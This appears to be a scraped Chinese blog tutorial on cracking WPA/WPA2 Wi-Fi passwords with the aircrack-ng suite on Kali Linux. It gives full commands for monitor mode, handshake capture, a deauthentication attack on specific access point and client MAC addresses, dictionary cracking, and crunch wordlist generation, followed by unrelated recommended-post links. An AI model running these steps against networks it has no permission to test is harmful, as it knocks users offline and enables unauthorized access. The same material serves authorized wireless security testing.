本机装好设备及驱动

电脑本机装好Realtek RTL8187 Wireless驱动连接好USB无线驱动

把设备转接给虚拟机

win+R,启动VMware USB Arbitration Service服务,出现不能把移动设备给虚拟机的情况,卸载VMware重装。

卸载方法:1.win+R输入appwiz.cpl卸载vmware。2.清理注册表,win+R输入regedit,清理vmware注册表信息。查找vmware,删除。

WPA-PSK的破解基于WPA-PSK握手验证报文数据的获取与识别,攻击者只要获取到尽可能的握手验证报文数据包就有机会破解。

安装 aircrack-ng 套件 
注:Kali linux 是自带组件的。

sudo apt-get install aircrak-ng

1) iwconfig   #或airmon-ng,查看无线网卡

2)ifconfig wlan0 up  #激活无线网卡。

3)airmon-ng start wlan0(无线网卡) #将无线网卡设置为监听模式。如果不是下面这张图片,要先执行airmon-ng check kill

4)airodump-ng wlan0mon(更新后为airodump-ng wlan0mon)   #查看附近的wifi。airodump-ng <你的monitor的interface名称>

  • BSSID是AP端的MAC地址
  • PWR是信号强度,数字越小越好
  • #Data是对应的路由器的在线数据吞吐量,数字越大,数据上传量越大。
  • CH是对应路由器的所在频道
  • ESSID是对应路由器的名称

监听wifi

5)airodump-ng -w 路径/文件名 -c 频道 --bssid mac地址 wlan0(处于监听模式下的无线网卡)    #对特定频道下的无线网络进行监听,扫描数据保存到特定文件。
即sudo airodump-ng -c 6 -w /root/handshake --bssid C0:00:00:00:00:48 wlan0mon

握手包文件的拓展名为 .cap 如红色方框所示。

然后,你的网卡会开始监听你目标端的频道,待会攻击认证时注意图片的右上角

保持此terminal窗口的运行状态

使用aireplay-ng进行解除认证攻击模式

握手包的概念,握手包指的是采用WPA加密方式的无线AP与无线客户端进行连接前的认证信息包。

一个合法的客户端要连上AP要经历四次握手(ex.2) 
1.你请求连AP 2.AP发一个数据包给你 
3.你将收到的数据包用wpa密钥加密,然后发给AP 
4.AP用自己保存的wpa密钥加密相同数据包,然后和你发给他的比较,如果相同,就发准许接入的许可。 
上面就是一个合法客户端四次握手的全过程,我们所说的抓握手包,是指抓AP发给合法客户的数据包,和合法客户端加密后发给AP的数据包。所以我们就抓这两个包,当我们有了明文和密文,就可以破解出密钥。

所以我们这里的关键是要发动攻击,迫使合法的客户端断线,进行重新认证,我们趁机抓包。

6)新建一个窗口,运行aireplay-ng -0 0 -a AP的mac地址 -c 客户端的mac地址 mon0(处于监听模式下的无线网卡) #-0代表deauth重传攻击方式,使客户端断开重连以便有机会得到握手验证数据报文

sudo aireplay-ng -0 0 -a 04:D1:3A:63:D9:02 -c 70:E2:01:61:87:84 wlan0mon

当获取握手包,监听窗口出现下图时,终止攻击。

7)关闭监听模式。

sudo airmon-ng stop wlan0mon

8)aircrack-ng -w 字典 捕获的cap文件  #使用预先准备好的字典破解密码,注意,WPA/WPA2加密的wifi密码是一种相对安全的密码保护机制,破解起来可能有一定的难度。

sudo aircrack-ng -w /root/pwdlist.txt /root/handshake-01.cap 
注:`aircrack-ng -w <字典路径> <握手包路径>

制作字典

安装crunch sudo apt-get install crunch

使用语法 crunch <min> max<max> <characterset> -t <pattern> -o <output filename>

<min> = 最小密码长度。 
<max> = 最大密码长度。 
<characterset> = 用于生成密码的字符集。 
<pattern> = 生成的密码的指定模式。 
<outputfile> = 保存字典文件的路径。

注: pattern中可以使用的特殊标记字符(ex.3) 
[%]插入数字 
[@] 插入小写字母 
[,] 插入大写字母 
[^] 插入符号

crunch 5 5 -t 1@,^9 -o /root/pwdlist.txt    #生成第一位为1,第二位为小写字母,第三位为答谢字母,第四位为符号,最后一位为9的五位数密码

crunch 1 6 0123456789 -o /root/pwdlist.txt   #生成1-6位纯数字(指定的0-9)的密码

crunch 0 8 0123456789 -o /root/pwdlist.txt  #生成0到8位的纯数字密码字典已经达到941M

Kali之aircrack-ng的更多相关文章

  1. 2017年最适用于WIFI HACK的无线网卡推荐

    http://www.freebuf.com/articles/wireless/140065.html 相信很多初次使用Kali Linux来进行无线渗透的小伙伴都曾遇到过一个非常头疼的问题,就是不 ...

  2. 适用于WIFI Hacking的无线网卡推荐

    相信很多初次使用Kali Linux来进行无线渗透的小伙伴都曾遇到过一个非常头疼的问题,就是不知道如何选购一款合适的无线网卡.因为Kali Linux并不是所有的网卡都支持,一旦选错了网卡不仅会给我们 ...

  3. 配置kali linux

    在7月底的时候,安全加介绍Fireeye出品的 免费恶意软件分析工具FlareVM,还可进行逆向工程和渗透测试 .今天是看到绿盟科技的一篇介绍Kali Linux配置的文章,这个工具也进入了 渗透测试 ...

  4. Kali Linux——迈向网络攻防

    自从进入大三的课程后,在已学的高数.线代.数论.概率论.信息论.通信等知识的技术上,开始了网络信息安全.网      络攻防的学习.俗话说得好,磨刀不误砍柴工,开始网络攻防之旅也势必要一个好的工具.然 ...

  5. crunch字典生成

    密码破解基本有三种方法:第一种是人工猜解(垃圾桶工程和被动信息收集): 第二种是基于字典暴力破解(主流) 在kali里,是默认自带了字典的,分别放在下面三个文件中:/usr/share/wordlis ...

  6. linux下用crunch工具生成密码

    crunch是一款linux下的压缩后仅仅38k的小程序,crunch程序在2004年及以前由email为的作者编写mimayin@aciiid.ath.cx,后续版本由bofh28@gmail.co ...

  7. Android手机流量分析工具介绍

    一.20 Best Android Hacking Apps And Tools Of 2018 首先罗列常见的Android手机hacking的工具 #1The Android Network Ha ...

  8. Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)

    Kali Linux能做很多事,但是它主要以渗透测试及'破解wifi密码'闻名. 如果你使用Macbook 请看 使用macbook破解WPA/WPA2 wifi密码 要求: 安装有Kali Linu ...

  9. kali linux wifi破解(aircrack)

    需要一个能监听的网卡 airmon-ng start wlan0(監聽網卡) airmon-ng check kill(清除其他有影响的環境) airodump-ng mon0 (掃描附近wifi) ...

  10. kali系统破解WPA密码实战

    上次发布过一篇在OSX系统破解WIFI密码的教程, 这次发布一篇使用kali破解wifi的教程 WEP和WPA/PSK的区别 WPA/PSK的加密方式相对于WEP的加密方式更加安全,WEP是一种老式的 ...

随机推荐

  1. 脱离JVM? Hadoop生态圈的挣扎与演化

    本文由知乎<大数据应用与实践>专栏 李呈祥授权发布,版权所有归作者,转载请联系作者! 新世纪以来,互联网及个人终端的普及,传统行业的信息化及物联网的发展等产业变化产生了大量的数据,远远超出 ...

  2. 脚本其实很简单-windows配置核查程序(1)

    先上成品图 需求描述 我们电脑上都安装各种过监控软件,比如360.鲁大师等等...其中有一个功能就是性能监控,在安全行业里面通常叫做"配置核查",目的就是将主机的各种性能指标展示, ...

  3. TQ2440系统介绍入门 、linux系统目录结构

    TQ2440开发板系统安装步骤: 1.先用JTAG线安装BIOS到开发板.下载BIOS,NOR/NAND开关选在NOR位置. 2.linux安装步骤: (1).格式化分区 (2).安装BIOS---& ...

  4. Linux:Centos7升级内核(转)

    更新前,内核版本为: uname -r 3.10.0-327.10.1.el7.x86_64 升级的方法: 1.导入key rpm --import https://www.elrepo.org/RP ...

  5. RNNs

    什么是RNN网络? RNNs背后的主要目的是要使用序列本身的顺序信息.在传统的神经网络里,我们假设输入(输出)是条件独立的.但是,在许多任务里,这是个非常非常差的假设.如果你想预测一个序列中的下一个单 ...

  6. yii2 中where条件查询

    在Yii的Model里进行查询的时候 where是必不可少的. Where方法声明为 static where( $condition ) 其中参数 $condition 类型为字符串或者数组1.字符 ...

  7. 给idea配置默认的maven

    一.配置Maven环境 1.下载apache-maven文件,选择自己需要的版本,地址: http://mirror.bit.edu.cn/apache/maven/maven-3/3.5.0/bin ...

  8. 两个java小练习

    网上看到的一个小练习,自己写了一个,但是时间限制并不符合,并且貌似还有些小问题,暂时放在这儿,代码格式什么的也不太规范. 1.班级排名时间限制: 1000ms 内存限制: 65536kB 描述 信息科 ...

  9. GRUB2 分析 (三)

    接上一篇 从地址0x8200开始的是lzma_decompress.img.这是由startup_raw.S编译生成的.这个文件稍微复杂点.首先一开始就是个跳转指令: ljmp $0, $ABS(LO ...

  10. 有道云笔记配合MPic+七牛云 自制MarkDown文档图床(适用Typora)

    注:从有道云笔记v6.5开始,有道云笔记会员可以使用MarkDown有道自带的图床.(但是非会员可以采用下面的七牛云图床+MarkDown方法) 0x00 前言 一直用有道云笔记,粘贴图片,做笔记没问 ...